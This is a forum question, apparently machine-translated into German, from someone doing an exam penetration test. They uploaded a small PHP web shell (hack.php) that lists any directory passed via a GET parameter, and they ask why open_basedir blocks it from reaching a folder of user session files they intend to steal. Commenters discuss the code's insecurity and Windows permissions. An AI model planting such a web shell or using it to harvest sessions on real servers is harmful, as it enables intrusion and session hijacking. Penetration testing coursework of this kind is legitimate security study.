Ich führe einen Stift Test auf einem Webserver als eine der Aufgaben in einer Prüfung, und nach dem Ausnutzen einer unbeschränkten Datei-Upload-Schwachstelle (https://www.owasp.org/index.php/Unrestricted_File_Upload), versuche ich auf einen bestimmten Ordner auf zugreifen der Web-Server, und ich diese Störung erhalte:open_basedir Einschränkung funktioniert nicht wie erwartet
Warning: scandir(): open_basedir restriction in effect. File(C:\inetpub\sitesdata\mysite.com\SESSIONS\USERS) is not within the allowed path(s): (C:\inetpub\vhosts\mysite.com\subdomains\me\httpdocs;C:\inetpub\sitesdata\mysite.com\SESSIONS\USERS) in C:\inetpub\vhosts\mysite.com\subdomains\me\httpdocs\ticketAttachments\4b3519fbe17e82993e76927e5f253e33\hack.php
Bitte beachten Sie, dass der Weg tatsächlich in den erlaubten Pfaden ist (ich denke, dass der Sinn dieser Aufgabe in der Prüfung, war es, alle Benutzersitzungen zu stehlen) .
Ich habe keinen Zugriff auf den Server, also kann ich keine Einstellungen auf dem Server ändern, ich muss nur alle sess_ * Dateien, die wahrscheinlich in diesem C:\inetpub\sitesdata\mysite.com\SESSIONS\USERS
Ordner gespeichert sind.
Dies sind die Inhalte meiner hack.php Datei:
<pre style="text-align:left">
<?php
$files = scandir($_GET['path']);
foreach ($files as $file) {
echo $file;
echo "\n";
}
?>
</pre>
ich versucht habe, den anderen Weg in den erlaubten Pfade Zugriff auf und es ist das gleiche. Aber die seltsame Sache ist, dass ich den Inhalt der C:\inetpub\vhosts\mysite.com\subdomains\me\httpdocs\ticketAttachments
lesen kann, aber nicht die C:\inetpub\vhosts\mysite.com\subdomains\me\httpdocs
, die tatsächlich in den zulässigen Pfaden ist.
Mache ich hier etwas falsch?
FWIW, Dinge wie 'function ($ _ GET [" foo "]);' sind sehr unsicher und negieren normalerweise jede mögliche Sicherheit. Nehmen Sie den Wert zur Variablen, bereinigen Sie ihn und übergeben Sie den bereinigten Wert und beginnen Sie dann erneut, über die Sicherheit zu sprechen. – Smar
@Smar Ich stimme völlig zu, wenn das ein Teil des Codes war. Aber diese Datei ist ein Exploit, sie soll nicht sicher sein. Ich habe es dort als böswilligen Versuch platziert, Zugang zu der Website zu bekommen, es soll unsicher und ausnutzbar sein. –
Ich habe Windows-Tag hinzugefügt, wie ich dies für PHP unter Windows ist, und oft gibt es Unterschiede zwischen Linux und Windows, wenn ich über PHP spreche, ich wäre nicht überrascht, wenn basedir einer davon wäre. Fühlen Sie sich frei, das Tag zu löschen, wenn Sie denken, dass es nicht da sein sollte. Es gibt auch Dateirechte von Windows, können diese auch beeinflussen? – Smar